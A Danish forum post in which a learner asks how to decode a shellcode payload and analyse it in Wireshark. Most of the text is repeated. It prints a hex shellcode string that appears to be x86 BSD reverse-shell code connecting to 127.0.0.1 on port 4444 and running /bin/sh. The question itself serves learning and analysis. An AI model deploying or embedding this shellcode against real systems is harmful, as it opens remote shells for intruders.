19-02-2014, 19:35
Jeg beklager på forhånd begrebsforvirring i denne beskrivelse. Ret mig gerne hvis der er noget jeg har helt galt fat i.
Der er mange områder jeg endnu ikke hjemme i endnu, men arbejder på sagen.
Anyhow, lad os sige at jeg genere pakke med en payload, og sender denne til en anden client på mit netværk.
Payloaden kunne så således ud:
Tænkt eksempel - snuppet fra:
http://securityweekly.com/2011/10/python...-code.html
1. Kan man ud fra payloaden alene "dekryptere" shellcoden?
2. Pakken bliver opfanget og kan analyseres i Wireshark - Er der her nogen mulighed for at finde ydligere oplysninger om hvad Shellcoden indeholde og har til formål?
(Mit bud her ville værer Follow TCP/UDP stream på den omtalte pakke)
Der er mange områder jeg endnu ikke hjemme i endnu, men arbejder på sagen.
Anyhow, lad os sige at jeg genere pakke med en payload, og sender denne til en anden client på mit netværk.
Payloaden kunne så således ud:
Kode:
\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80
http://securityweekly.com/2011/10/python...-code.html
1. Kan man ud fra payloaden alene "dekryptere" shellcoden?
2. Pakken bliver opfanget og kan analyseres i Wireshark - Er der her nogen mulighed for at finde ydligere oplysninger om hvad Shellcoden indeholde og har til formål?
(Mit bud her ville værer Follow TCP/UDP stream på den omtalte pakke)